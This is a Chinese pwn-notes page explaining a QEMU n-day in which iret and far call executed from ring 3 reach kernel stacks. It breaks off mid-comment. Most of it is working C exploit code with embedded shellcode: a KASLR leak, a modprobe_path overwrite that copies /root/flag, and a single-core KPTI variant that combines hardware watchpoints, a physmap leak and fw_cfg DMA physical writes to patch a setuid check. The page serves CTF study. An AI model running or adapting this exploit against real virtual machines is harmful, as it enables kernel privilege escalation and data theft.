> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/qemu-nday.md).

# QEMU-nday

> 在 9.1 版本前的 QEMU 的所有版本，`iret` 和 `call far` 指令都存在缺陷。

## 漏洞原理

`iretq` 用于从中断返回：它会从栈上依次弹出 `rip`、`cs`、`rflags`、`rsp`、`ss`

`call far` 用于改变指令指针、修改 `cs` 的值，并将保存的 `rip` 和 `cs` 压入栈中

`QEMU` 的开发者假设这些指令一定是在 `ring 0` 执行的。如果当前处于 `ring 3` 并且返回到 `ring 3`（只是设置新的 `cs`、`ss` 值），QEMU 访问栈时不会按用户态权限进行检查，**仿佛当前特权级是 0**

将 `rsp` 更改为任意可写内核页面地址，进行 `lcall`，我们可以在任意地址写入调用指令的地址，由于我们至少可以控制 `lcall` 指令地址的最后一个字节的值，因此每次可以写入一个任意字节。

## 利用流程

用户态发生故障时 `rip` 控制权交给内核，此时内核仍在用户页表，需要一个**共享栈**执行上下文切换

通过触发整数除零错误，在共享栈上构建一个有效的 `iret` 帧结构（`r15`\~`r12` 分别设置为 `cs`/`rflags`/`rsp`/`ss`）；然后用 `sgdt` 读出 GDT 基址并据此算出共享栈地址，使 `rsp` 指向该地址后执行 `iretq`：此时 `rip` 会被设置为帧中残留的内核地址，回到用户态取指时触发缺页异常，该地址随即可以在 `SIGSEGV` 处理函数中读到

当 CPU 执行整数除零操作时会触发异常；如果使用 `sigaction` 注册了 `SIGFPE` 处理函数，进程就不会被终止（浮点除零默认不触发异常，仅在 `MXCSR` 寄存器的除零屏蔽位 ZM（第 9 位）清零时才会触发）。

### 泄露代码

```c
#include  "helpers.h"
#include  <sys/syscall.h>
#include  <signal.h>
#include  <setjmp.h>

/* Kernel address captured by sigsegv_handler() and printed by main(). */
uint64_t kbase;
/* Jump buffer: sigsegv_handler() uses it to return to the sigsetjmp() call in main(). */
static sigjmp_buf env;

/*
 * SIGFPE handler: resume execution after the instruction that faulted.
 *
 * The RIP saved in the signal context is advanced by 3 bytes, so when the
 * handler returns the interrupted code continues past the faulting
 * instruction instead of re-executing it. The only division in this listing
 * is `div rax` in kaslr(); 3 is presumably its encoded length.
 *
 * sig and si are unused.
 */
void sigfpe_handler(int sig, siginfo_t *si, void *context) {
    enum { FAULTING_INSN_LEN = 3 };
    ucontext_t *saved = context;

    saved->uc_mcontext.gregs[REG_RIP] =
        saved->uc_mcontext.gregs[REG_RIP] + FAULTING_INSN_LEN;
}

/*
 * SIGSEGV handler: record the faulting RIP and unwind back to main().
 *
 * The RIP stored in the signal context is copied verbatim into the global
 * kbase, then siglongjmp() transfers control to the sigsetjmp() point, so
 * this handler never returns to the faulting code.
 *
 * sig and si are unused.
 */
void sigsegv_handler(int sig, siginfo_t *si, void *context) {
    const ucontext_t *saved = context;

    kbase = (uint64_t)saved->uc_mcontext.gregs[REG_RIP];

    siglongjmp(env, 1);
}

/*
 * Obtain a kernel text address via a stale register frame and iretq.
 *
 *  1. Load r15..r12 with the cs / rflags / rsp / ss values of a user-mode
 *     iret frame.
 *  2. Divide by zero. sigfpe_handler() skips the faulting instruction; per the
 *     surrounding write-up, the kernel's exception entry has by then saved the
 *     registers on its entry stack, leaving a return address followed by
 *     r15, r14, r13, r12 in memory.
 *  3. Read the GDT base with sgdt and add 0x1f50 to reach that stale frame
 *     (the offset is presumably specific to the target kernel build).
 *  4. Execute iretq with rsp pointing at it.
 *
 * This function does not return normally: the resulting fault is handled by
 * sigsegv_handler(), which siglongjmp()s back to the caller. The asm
 * overwrites rsp, rax and r12-r15 without declaring clobbers, which is only
 * tolerable because of that non-local exit.
 *
 * The block ends with `.att_syntax prefix` so the assembler is back in the
 * mode the compiler's own (%-prefixed) output expects.
 */
void kaslr() {
    asm volatile(
        ".intel_syntax noprefix\n"
        "mov r15, 0x33\n"            /* cs for the fake frame */
        "mov r14, 0x206\n"           /* rflags */
        "mov r13, 0x133a000\n"       /* rsp: top of the region mmap()ed by main() */
        "mov r12, 0x2b\n"            /* ss */
        "mov rax, 0\n"
        "div rax\n"                  /* raises the divide error; handler skips this insn */
        "push rax\n"                 /* make room for the sgdt result */
        "sgdt [rsp]\n"               /* stores 2-byte limit, then 8-byte base at rsp+2 */
        /*
         * NOTE(review): the base lives at rsp+2; the extra `-8` presumably
         * compensates for the assembler treating the bare `qword` keyword
         * (no `ptr`) as the constant 8 -- verify with your binutils version.
         */
        "mov rax, qword [rsp+2-8]\n"
        "add rax, 0x1f50\n"
        "mov rsp, rax\n"
        "iretq\n"
        ".att_syntax prefix\n"
    );
}

/*
 * Install the SIGFPE/SIGSEGV handlers, map the user stack region referenced by
 * kaslr(), run kaslr() once and print the value captured in kbase.
 *
 * Returns 0 on completion, 1 if the stack mapping cannot be created.
 */
int main() {
    struct sigaction sa_fpe = {0};
    sa_fpe.sa_sigaction = sigfpe_handler;
    sa_fpe.sa_flags = SA_SIGINFO;
    sigaction(SIGFPE, &sa_fpe, NULL);

    struct sigaction sa_segv = {0};
    sa_segv.sa_sigaction = sigsegv_handler;
    sa_segv.sa_flags = SA_SIGINFO;
    sigemptyset(&sa_segv.sa_mask);
    sigaction(SIGSEGV, &sa_segv, NULL);

    /*
     * Two pages ending at 0x133a000, the rsp value kaslr() places in r13.
     * Fail early if the mapping is refused instead of faulting later on an
     * unmapped stack.
     */
    void *user_stack = mmap((void *)0x1338000, PAGE_SIZE*2,
                            PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_POPULATE,
                            -1, 0);
    if (user_stack == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    /* sigsegv_handler() siglongjmp()s back here with a non-zero value. */
    if (sigsetjmp(env, 1) == 0) {
        kaslr();
    }

    printf("[!] kbase: 0x%lx\n", kbase);
    return 0;
}
```

### 汇编分析

```c
/*
 * Annotated copy of kaslr(): load a fake user-mode iret frame into r15..r12,
 * fault with a division by zero so those registers get saved by the kernel,
 * locate the saved copy from the GDT base, and execute iretq on it.
 *
 * Does not return normally; the final fault is caught by the SIGSEGV handler.
 * The block ends with `.att_syntax prefix` so the assembler is back in the
 * mode the compiler's own (%-prefixed) output expects.
 */
void kaslr() {
    asm volatile(
        ".intel_syntax noprefix\n"
        "mov r15, 0x33\n"            /* cs */
        "mov r14, 0x206\n"           /* rflags */
        "mov r13, 0x133a000\n"       /* rsp */
        "mov r12, 0x2b\n"            /* ss */
        "mov rax, 0\n"
        "div rax\n"                  /* divide error; the SIGFPE handler skips this insn */
        "push rax\n"                 /* scratch space for sgdt */
        "sgdt [rsp]\n"               /* 2-byte limit, then 8-byte base at rsp+2 */
        /*
         * NOTE(review): the `-8` presumably cancels the value the assembler
         * assigns to the bare `qword` keyword -- verify with your binutils.
         */
        "mov rax, qword [rsp+2-8]\n"
        "add rax, 0x1f50\n"          /* offset from GDT base to the saved frame */
        "mov rsp, rax\n"
        "iretq\n"
        ".att_syntax prefix\n"
    );
}
```

我们把一些关键信息（要伪造的栈结构）放入 `r12`\~`r15` 寄存器，只有这四个寄存器才会推入共享栈中，触发整数除零中断后，转到内核态执行中断处理（`asm_exc_divide_error`）

![image-20260529195146492](/files/l6sw2R57vB0RuprhCvja)

可以看见我们在一个栈页底部实现了：

```assembly
push r12    ; ss
push r13    ; rsp
push r14    ; rflags
push r15    ; cs
push rip    ; 内核返回地址
```

处理完函数后返回用户态，使用 `sgdt` 指令得到 `cpu_entry` 的基址，然后计算得到内核入口栈地址

![image-20260529201203072](/files/kJ47a6gpEndvfj6mrSRi)

到了 `iret`：

![image-20260529201528068](/files/HptE9YYfY2vxugbbenzP)

可以看见，`iret` 所使用的栈上正是我们伪造的结构，它是此前处理整数除零异常时留下的。

> `call error_entry` 时将 `rip` 放在共享栈上
>
> 进入 `error_entry` 后立刻执行：
>
> ```
>  ► 0xffffffff94c01b20 <error_entry>       push   rsi
>    0xffffffff94c01b21 <error_entry+1>     mov    rsi, qword ptr [rsp + 8]
> ```
>
> 这样就把用于返回的内核地址存入了 `rsi`，随后保存寄存器时它又被压到了栈上

```assembly
push r15
push r14
push r13
push r12
```

再加上 QEMU 中 `iret` 的漏洞，即使在 ring 3 执行 `iret`，也能访问这块内核栈。

![image-20260529201906138](/files/qJtcPc2FfSA6RNxmX9Pi)

立刻触发缺页异常：

![image-20260529202030341](/files/IMxyV3C5GUUvn6ZF8aHe)

处理完了后，在我们的栈上会留下结构体，这个结构体里面保存着内核地址 `asm_sysvec_apic_timer_interrupt+15`：

![image-20260529204155228](/files/SBdmUXyuom6fL81Q63fl)

然后通过 `siglongjmp` 回到 `sigsetjmp` 保存的上下文，恢复到原来的栈上

### nokpti

```c
#define DBG
#include  <stdio.h>
#include  <stdlib.h>
#include  <stdint.h>
#include  <string.h>
#include  <unistd.h>
#include  <sys/ucontext.h>
#include  <sys/mman.h>
#include  <sys/syscall.h>
#include  <sys/types.h>
#include  <fcntl.h>
#include <sys/stat.h>
#include  <signal.h>
#include  <setjmp.h>

#define PAGE_SIZE 0x1000
/* Fallback index of RIP in uc_mcontext.gregs when the libc headers do not expose REG_RIP. */
#ifndef REG_RIP
#define REG_RIP 16
#endif

/*
 * Subtracted from the RIP captured in sigsegv_handler() to obtain kbase.
 * NOTE(review): presumably specific to the target kernel build -- confirm.
 */
#define ASM_EXC_DIVIDE_ERROR_OFFSET    (0x1200930+11)
/* Added to kbase in main() to form the address that is written byte by byte. */
#define MODPROBE_PATH 					0x23dd420

/* Kernel base computed by sigsegv_handler(). */
uint64_t kbase;
/* Jump buffer used by sigsegv_handler() to return to main(). */
static sigjmp_buf env;
/*
 * Machine-code blob that main() copies into an executable page and calls as
 * void (*)(unsigned long addr, unsigned char byte).
 */
uint8_t modprobe_path_shellcode[] = {235, 10, 73, 112, 51, 1, 0, 0, 0, 0, 51, 0, 80, 83, 81, 82, 72, 184, 72, 184, 2, 112, 51, 1, 0, 0, 72, 187, 0, 0, 72, 255, 24, 0, 0, 0, 185, 0, 114, 51, 1, 64, 0, 241, 128, 233, 13, 72, 137, 1, 72, 131, 193, 8, 72, 137, 25, 72, 131, 233, 8, 72, 137, 226, 72, 137, 252, 72, 131, 196, 16, 255, 225, 72, 137, 212, 90, 89, 91, 88, 195};


/*
 * SIGFPE handler: step the saved RIP over the faulting instruction.
 *
 * Adds 3 to the RIP stored in the signal context so execution resumes after
 * the instruction that raised the signal (presumably the 3-byte `div rax`
 * in kaslr()). sig and si are unused.
 */
void sigfpe_handler(int sig, siginfo_t *si, void *context) {
    enum { FAULTING_INSN_LEN = 3 };
    ucontext_t *saved = context;

    saved->uc_mcontext.gregs[REG_RIP] =
        saved->uc_mcontext.gregs[REG_RIP] + FAULTING_INSN_LEN;
}

/*
 * SIGSEGV handler: derive kbase from the faulting RIP and unwind to main().
 *
 * kbase is set to the RIP saved in the signal context minus
 * ASM_EXC_DIVIDE_ERROR_OFFSET; siglongjmp() then returns control to the
 * sigsetjmp() point, so this handler never returns. sig and si are unused.
 */
void sigsegv_handler(int sig, siginfo_t *si, void *context) {
    const ucontext_t *saved = context;
    const uint64_t fault_rip = (uint64_t)saved->uc_mcontext.gregs[REG_RIP];

    kbase = fault_rip - ASM_EXC_DIVIDE_ERROR_OFFSET;

    siglongjmp(env, 1);
}

/*
 * Obtain a kernel text address via a stale register frame and iretq.
 *
 * r15..r12 are loaded with the cs / rflags / rsp / ss values of a user-mode
 * iret frame, then a division by zero makes the kernel save them. The saved
 * copy is located from the GDT base (sgdt) plus 0x1f50, and iretq is executed
 * with rsp pointing at it.
 *
 * Does not return normally: the resulting fault is handled by
 * sigsegv_handler(), which siglongjmp()s back to main(). The asm overwrites
 * rsp, rax and r12-r15 without declaring clobbers, which is only tolerable
 * because of that non-local exit.
 *
 * The block ends with `.att_syntax prefix` (as the other asm blocks in this
 * document do) so the assembler is back in the mode the compiler's own
 * %-prefixed output expects.
 */
void kaslr() {
    asm volatile(
        ".intel_syntax noprefix\n"
        "mov r15, 0x33\n"            /* cs */
        "mov r14, 0x206\n"           /* rflags */
        "mov r13, 0x133a000\n"       /* rsp: top of the region mmap()ed by main() */
        "mov r12, 0x2b\n"            /* ss */

        "mov rax, 0\n"
        "div rax\n"                  /* divide error; sigfpe_handler() skips this insn */

        "push rax\n"                 /* scratch space for sgdt */
        "sgdt [rsp]\n"               /* 2-byte limit, then 8-byte base at rsp+2 */
        /*
         * NOTE(review): the `-8` presumably cancels the value the assembler
         * assigns to the bare `qword` keyword -- verify with your binutils.
         */
        "mov rax, qword [rsp+2-8]\n"
        "add rax, 0x1f50\n"
        "mov rsp, rax\n"

        "iretq\n"
        ".att_syntax prefix\n"
    );
}

/*
 * Write a helper shell script and a dummy "trigger" file, then execve() the
 * trigger.
 *
 * script_path  - file that receives a /bin/sh script copying flag_path to
 *                /tmp/flag and making it world-accessible; chmod 0755.
 * trigger_path - file that receives the four bytes ff ff ff ff; chmod 0755.
 * flag_path    - path interpolated into the script.
 *
 * Failure to create either file is reported with perror() and the function
 * carries on (best effort). The trigger is not a valid executable, so
 * execve() is expected to fail and return; the message afterwards marks that
 * point.
 */
void modprobe_old(const char *script_path, const char *trigger_path, const char *flag_path) {
    FILE *script = fopen(script_path, "w");
    if (script == NULL) {
        perror(script_path);
    } else {
        fprintf(script, "#!/bin/sh\ncp %s /tmp/flag\nchmod 777 /tmp/flag\n", flag_path);
        fclose(script);
        chmod(script_path, 0755);
    }

    FILE *trigger = fopen(trigger_path, "wb");
    if (trigger == NULL) {
        perror(trigger_path);
    } else {
        fwrite("\xff\xff\xff\xff", 1, 4, trigger);
        fclose(trigger);
        chmod(trigger_path, 0755);
    }

    execve(trigger_path, (char *[]){(char *)trigger_path, NULL}, NULL);
    puts("[!] execve modprobe");
}

/*
 * Driver for the nokpti variant.
 *
 *  1. Install the SIGFPE/SIGSEGV handlers and map the stack region used by
 *     kaslr(); run kaslr() to fill in kbase.
 *  2. Map an executable page at 0x1337000, copy modprobe_path_shellcode into
 *     it and call it once per byte to write the 7 bytes "/tmp/a\0" at
 *     kbase + MODPROBE_PATH.
 *  3. Call modprobe_old() and print /tmp/flag.
 *
 * Returns 0 on completion, 1 if either mapping cannot be created.
 */
int main() {
    struct sigaction sa_fpe = {0};
    sa_fpe.sa_sigaction = sigfpe_handler;
    sa_fpe.sa_flags = SA_SIGINFO;
    sigaction(SIGFPE, &sa_fpe, NULL);

    struct sigaction sa_segv = {0};
    sa_segv.sa_sigaction = sigsegv_handler;
    sa_segv.sa_flags = SA_SIGINFO;
    sigemptyset(&sa_segv.sa_mask);
    sigaction(SIGSEGV, &sa_segv, NULL);

    /* Two pages ending at 0x133a000, the rsp value kaslr() places in r13. */
    void *user_stack = mmap((void *)0x1338000, PAGE_SIZE*2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_POPULATE, -1, 0);
    if (user_stack == MAP_FAILED) {
        perror("mmap stack");
        return 1;
    }

    /* sigsegv_handler() siglongjmp()s back here with a non-zero value. */
    if (sigsetjmp(env, 1) == 0) {
        kaslr();
    }

    printf("[!] kbase: 0x%lx\n", kbase);

    /* Without this check a failed mmap would make memcpy write to MAP_FAILED. */
    void *code_mapping = mmap((void *)0x1337000, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0);
    if (code_mapping == MAP_FAILED) {
        perror("mmap code");
        return 1;
    }

    memcpy((uint8_t *)code_mapping, modprobe_path_shellcode, sizeof(modprobe_path_shellcode));

    /* Little-endian bytes 2f 74 6d 70 2f 61 00, i.e. the string "/tmp/a". */
    unsigned long gadget = 0x0000612f706d742f;
    for (int i = 0; i < 7; ++i)
        ((void(*)(unsigned long, unsigned char))code_mapping)(kbase + MODPROBE_PATH + i, (gadget >> (i*8)) & 0xff);

    modprobe_old("/tmp/a", "/tmp/b", "/root/flag");

    puts("[+] finished");
    system("cat /tmp/flag");
    return 0;
}
```

### kpti

[CVE-2022-42703](/pwn-gitbook/kpwn/kpwn-tricks/cve-2022-42703.md)

#### 双核环境

使用上面的思路可以解决，不过需要2个核，利用一个核心上的任意写入漏洞，在另一个核心的异常栈上写入恶意载荷

#### 单核环境（通用）

当然，也有在单核环境下就能完成的方法

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/io.h>
#include <sys/mman.h>
#include <asm/user_64.h>
#include <stddef.h>
#include <setjmp.h>
#include <arpa/inet.h>

#define PAGE_SIZE 0x1000

/* Address mapped by tracee() and programmed into DR0 by set_hw_watch(). */
#define WATCH_ADDR 0xdead000


/* REG_ERR value captured by sigsegv_handler(); also used as the pipe payload in physmap_leak(). */
uint64_t g_errno;
/* Jump buffer: sigsegv_handler() longjmp()s to the setjmp() in physmap_leak(). */
jmp_buf env;
/* Alternate signal stack registered by siginit(). */
static char stack[0x4000];


/*
 * Added to the leaked physmap base in main() to form the TSS address.
 * NOTE(review): presumably the physical address of the TSS on the target -- confirm.
 */
#define TSS_PHYS 0xf405000
/*
 * Machine-code blob that arb_w() copies into an executable page and calls as
 * void (*)(unsigned long addr, unsigned char byte).
 */
uint8_t arb_w_shellcode[] = {235, 10, 73, 112, 51, 1, 0, 0, 0, 0, 51, 0, 80, 83, 81, 82, 72, 184, 72, 184, 2, 112, 51, 1, 0, 0, 72, 187, 0, 0, 72, 255, 24, 0, 0, 0, 185, 0, 114, 51, 1, 64, 0, 241, 128, 233, 13, 72, 137, 1, 72, 131, 193, 8, 72, 137, 25, 72, 131, 233, 8, 72, 137, 226, 72, 137, 252, 72, 131, 196, 16, 255, 225, 72, 137, 212, 90, 89, 91, 88, 195};


/* Lower bound and step of the physical kernel-base scan in fw_cfg(). */
#define CONFIG_PHYSICAL_START   0ul
#define CONFIG_PHYSICAL_ALIGN   0x200000ul

/* File read by check_kptr_restrict(), and the offset added to each candidate base in fw_cfg(). */
#define KPTR_RESTRICT           "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET    0x22b5db0ul

/* Offset (from the physical kernel base) of the 7 bytes fw_cfg() overwrites before calling setuid(0). */
#define SETUID_CHECK            0x2e3ca2ul

/* I/O ports written with outl() in phys_arb_w(). */
#define BIOS_CFG_DMA_ADDR_HIGH  0x514
#define BIOS_CFG_DMA_ADDR_LOW   0x518

/* Value shifted into bits 16+ of the control word in phys_arb_w(). */
#define FW_CFG_SIGNATURE	    0x00
/* Byte source searched by memmem() in phys_arb_w(). */
#define SIGNATURE               "QEMU"

/*
 * Value returned by sp0_get_cmd().
 * NOTE(review): presumably the physical address where the saved r15/r14 land -- confirm for the target.
 */
#define SP0_PTREGS_PHYS_ADDR    0xf40bf58ul

/*
 * Bit flags OR-ed into the control word passed to sp0_get_cmd().
 * NOTE(review): presumably these mirror the control bits of QEMU's fw_cfg DMA
 * interface -- verify against the fw_cfg specification.
 */
typedef enum fw_cfg_ctl_t {
    fw_ctl_error  = 1 << 0,
    fw_ctl_read   = 1 << 1,
    fw_ctl_skip   = 1 << 2,
    fw_ctl_select = 1 << 3,
    fw_ctl_write  = 1 << 4
} fw_cfg_ctl_t;


// TRIGGER DEBUG
/*
 * Program a hardware watchpoint in a traced child.
 *
 * pid  - tracee to modify (must currently be ptrace-stopped).
 * addr - address written to debug register 0.
 *
 * The three pokes target the u_debugreg slots of struct user, in this order:
 * DR0 = addr, DR7 = 0xf0101, DR6 = 0. In 0xf0101 bits 0, 8 and 16-19 are set.
 * NOTE(review): per the x86 DR7 layout that is L0 | LE | R/W0=11b | LEN0=11b,
 * i.e. an 8-byte read/write watch on DR0 -- confirm.
 * ptrace() return values are not checked.
 */
static void set_hw_watch(pid_t pid, uint64_t addr) {
    const uint64_t off_dr0 = offsetof(struct user, u_debugreg[0]);
    const uint64_t off_dr6 = offsetof(struct user, u_debugreg[6]);
    const uint64_t off_dr7 = offsetof(struct user, u_debugreg[7]);

    ptrace(PTRACE_POKEUSER, pid, off_dr0, addr);
    ptrace(PTRACE_POKEUSER, pid, off_dr7, 0xf0101);
    ptrace(PTRACE_POKEUSER, pid, off_dr6, 0);
}

/*
 * Child half of trigger_debug(): become a ptrace tracee, stop so the parent
 * can program the debug registers, then make the kernel read one byte from
 * WATCH_ADDR via write(). Never returns; exits with status 0.
 */
void tracee() {
    /* Request tracing and stop; the parent's first waitpid() observes this stop. */
    ptrace(PTRACE_TRACEME, 0, 0, 0);
    raise(SIGSTOP);

    /* Map a populated page at WATCH_ADDR, the address the parent watches. */
    mmap((void *) WATCH_ADDR, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0);

    sleep(1);

	/*
	 * WATCH_ADDR is the source buffer of write(), so the one-byte copy out of
	 * it is performed by the kernel on this process's behalf.
	 * NOTE(review): presumably this is what makes the watchpoint fire while in
	 * kernel mode -- confirm.
	 */
	int pipes[2];
	pipe(pipes);
	write(pipes[1], (void*) WATCH_ADDR, 1);
	
    _exit(0);
}

/*
 * Fork a tracee, arm a hardware watchpoint on WATCH_ADDR in it, and shepherd
 * it until it terminates.
 *
 * SIGTRAP stops are resumed with the signal suppressed; any other stop signal
 * is forwarded to the child. The loop ends when the child exits or is killed
 * by a signal, or when waitpid() fails. Without the last two conditions a
 * killed child would leave the loop spinning on a failing waitpid().
 * fork()/waitpid() failures are reported with perror() and the function
 * returns.
 */
void trigger_debug() {
    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        return;
    }
    if (pid == 0)
        tracee();   /* never returns */

    int st;
    /* Wait for the child's initial SIGSTOP before touching its debug registers. */
    if (waitpid(pid, &st, 0) < 0) {
        perror("waitpid");
        return;
    }

    set_hw_watch(pid, WATCH_ADDR);
    ptrace(PTRACE_CONT, pid, 0, 0);

    for (;;) {
        if (waitpid(pid, &st, 0) < 0) {
            perror("waitpid");
            break;
        }

        if (WIFEXITED(st) || WIFSIGNALED(st))
            break;

        if (WIFSTOPPED(st)) {
            int sig = WSTOPSIG(st);
            /* Swallow SIGTRAP; pass every other signal through. */
            ptrace(PTRACE_CONT, pid, 0, sig == SIGTRAP ? 0 : sig);
        }
    }
}

// ARB READ
/*
 * SIGSEGV handler for the byte-read primitive.
 *
 * Saves the REG_ERR slot of the signal context in g_errno, points the saved
 * RSP at stack + 0x1000, and longjmp()s back to the setjmp() in
 * physmap_leak(). The handler therefore never returns to the faulting code.
 * sig and info are unused.
 */
void sigsegv_handler(int sig, siginfo_t *info, void *ctx) {
    ucontext_t *saved = ctx;

    g_errno = saved->uc_mcontext.gregs[REG_ERR];
    saved->uc_mcontext.gregs[REG_RSP] = (uint64_t)(stack + 0x1000);

    longjmp(env, 1);
}

struct sigaction orig_sa;
void siginit() {
	stack_t ss = {
		.ss_size = 0x4000,
		.ss_sp = stack,
	};
	struct sigaction sa = {.sa_sigaction = sigsegv_handler,
							.sa_flags = SA_ONSTACK | SA_SIGINFO};
	sigaltstack(&ss, 0);
	sigfillset(&sa.sa_mask);
	sigaction(SIGSEGV, &sa, &orig_sa);
}

/*
 * Execute iretq with rsp set to addr - 9.
 *
 * iretq pops rip from [rsp] and cs from [rsp+8], so the byte stored at addr
 * ends up in bits 8..15 of the cs slot. The caller (physmap_leak) recovers it
 * as (REG_ERR >> 8) & 0xff from the value saved by sigsegv_handler().
 * NOTE(review): presumably the fault's error code reports the rejected
 * selector -- confirm.
 *
 * Does not return normally: the fault is expected to reach sigsegv_handler(),
 * which longjmp()s back to the caller's setjmp(). rsp is overwritten without
 * being declared as clobbered.
 */
void arb_r(uint64_t addr) {
	asm volatile(
		".intel_syntax noprefix\n"
		"mov rsp, %0\n"
		"sub rsp, 9\n"
		"iretq\n"
		".att_syntax prefix\n"
		:
		: "r" (addr)
		: 
	);
}

/*
 * Recover the physmap base one byte at a time.
 *
 * The GDT base is read with sgdt; the 8-byte value at gdt_base + 0xffc8
 * (named ist3 here) is then sampled at byte offsets 3, 4 and 5. Each byte is
 * read in a forked child: the child installs the SIGSEGV handler, calls
 * arb_r() and sends the captured g_errno back over a pipe. The parent places
 * bits 8..15 of that value at the matching byte position of the result, on
 * top of the fixed 0xffff000000000000 prefix, and finally clears the low 28
 * bits.
 *
 * Returns the reconstructed address. pipe()/fork() failures and short reads
 * are reported and terminate the process, since the result would otherwise be
 * built from stale data.
 */
uint64_t physmap_leak() {
    char gdt[10];
    /*
     * sgdt stores through the pointer, so a "memory" clobber is needed to
     * tell the compiler that gdt has been written.
     */
    asm volatile (
        ".intel_syntax noprefix\n"
        "sgdt [%0]\n"
        ".att_syntax prefix\n"
        :
        : "r" (gdt)
        : "memory"
    );

    /* The base follows the 2-byte limit; memcpy avoids an unaligned, type-punned load. */
    uint64_t gdt_addr;
    memcpy(&gdt_addr, &gdt[2], sizeof(gdt_addr));

    uint64_t ist3 = gdt_addr + 0xffc8;
    uint64_t physmap = 0xffff000000000000;

    for (int i = 0; i < 3; i++) {
        int pipes[2];
        if (pipe(pipes) < 0) {
            perror("pipe");
            exit(EXIT_FAILURE);
        }

        pid_t child = fork();
        if (child < 0) {
            perror("fork");
            exit(EXIT_FAILURE);
        }

        if (child == 0) {
            siginit();
            /* sigsegv_handler() longjmp()s back here after filling g_errno. */
            if (setjmp(env) == 0) {
                arb_r(ist3+3+i);
            }

            write(pipes[1], &g_errno, sizeof(g_errno));
            _exit(0);
        }

        /* Drop our write end so read() sees EOF if the child dies without writing. */
        close(pipes[1]);
        ssize_t got = read(pipes[0], &g_errno, sizeof(g_errno));
        close(pipes[0]);
        waitpid(child, NULL, 0);   /* reap the child */

        if (got != (ssize_t)sizeof(g_errno)) {
            fprintf(stderr, "physmap_leak: no result from child %d\n", i);
            exit(EXIT_FAILURE);
        }

        g_errno >>= 8;
        g_errno &= 0xff;
        physmap += (g_errno << ((3+i)*8));
    }

    physmap &= 0xfffffffff0000000;
    return physmap;
}

// IOPL
/*
 * Copy arb_w_shellcode into an executable page and call it twice to store the
 * two bytes 0x00, 0x30 (the little-endian value 0x3000) at addr and addr + 1.
 *
 * addr - destination passed as the first argument of the copied code.
 *
 * The page is requested at 0x1337000, but without MAP_FIXED that address is
 * only a hint. A failed mapping is reported and the function returns, instead
 * of copying into MAP_FAILED; a mapping at a different address is reported as
 * a warning.
 * NOTE(review): the blob contains byte sequences that look like addresses
 * inside that page (e.g. 2,112,51,1 = 0x01337002), so it is presumably
 * position-dependent -- confirm.
 */
void arb_w(uint64_t addr) {
    void *const wanted = (void *)0x1337000;
    void *code_mapping = mmap(wanted, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
    if (code_mapping == MAP_FAILED) {
        perror("mmap");
        return;
    }
    if (code_mapping != wanted)
        fprintf(stderr, "arb_w: code page mapped at %p instead of %p\n", code_mapping, wanted);

    memcpy((uint8_t *)code_mapping, arb_w_shellcode, sizeof(arb_w_shellcode));

    uint64_t gadget = 0x3000;
    for (int i = 0; i < 2; ++i)
        ((void(*)(unsigned long, unsigned char))code_mapping)(addr+i, (gadget >> (i*8)) & 0xff);
}

/*
 * SIGFPE handler: step the saved RIP over the faulting instruction.
 *
 * Adds 3 to the RIP stored in the signal context so execution resumes after
 * the instruction that raised the signal (presumably the 3-byte `div rax`
 * in sp0_get_cmd()). sig and si are unused.
 */
void sigfpe_handler(int sig, siginfo_t *si, void *context) {
    enum { FAULTING_INSN_LEN = 3 };
    ucontext_t *saved = context;

    saved->uc_mcontext.gregs[REG_RIP] =
        saved->uc_mcontext.gregs[REG_RIP] + FAULTING_INSN_LEN;
}

/*
 * Place a 16-byte command in r15:r14 and raise a divide error so that the
 * register values get saved by the kernel.
 *
 * control, length - converted to big-endian 32-bit values; r15 ends up as
 *                   (length << 32) | control.
 * address         - converted to big-endian 64 bits and loaded into r14.
 *
 * The `div rax` with rax == 0 faults; sigfpe_handler() (installed by
 * fw_cfg()) skips the instruction, so the function then returns normally.
 *
 * Returns the constant SP0_PTREGS_PHYS_ADDR.
 * NOTE(review): presumably that is the physical address at which the saved
 * r15/r14 pair can be found afterwards, and the {control, length, address}
 * layout presumably matches QEMU's fw_cfg DMA descriptor -- confirm both.
 */
uint64_t sp0_get_cmd(uint32_t control, uint64_t address, uint32_t length) {
    /* The three fields are stored big-endian. */
    control = htonl(control);
    address = htobe64(address);
    length = htonl(length);

    asm volatile(
        ".intel_syntax noprefix\n"
        "mov r15d, %1\n"
        "shl r15, 32\n"
        "mov r14d, %0\n"
        "or r15, r14\n"
        "mov r14, %2\n"
        "mov rax, 0\n"
        "div rax\n"
        ".att_syntax prefix\n"
        :
        : "r" (control), "r" (length), "r" (address)
        : "rax", "r14", "r15"
    );

    return SP0_PTREGS_PHYS_ADDR;
}

/*
 * Write the physical address of a prepared command to the two DMA address
 * ports, big-endian, high half first. The high half is skipped when it is
 * zero.
 */
static void fw_cfg_dma_submit(uint64_t cmd_physaddr) {
    uint32_t lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    uint32_t hi = (uint32_t)(cmd_physaddr >> 32);

    if (hi)
        outl(htonl(hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(lo), BIOS_CFG_DMA_ADDR_LOW);
}

/*
 * Store `size` bytes equal to `value` at physical address phys_addr, using
 * bytes taken from SIGNATURE as the data source.
 *
 * phys_addr - destination physical address.
 * value     - bytes to write; must occur contiguously inside SIGNATURE
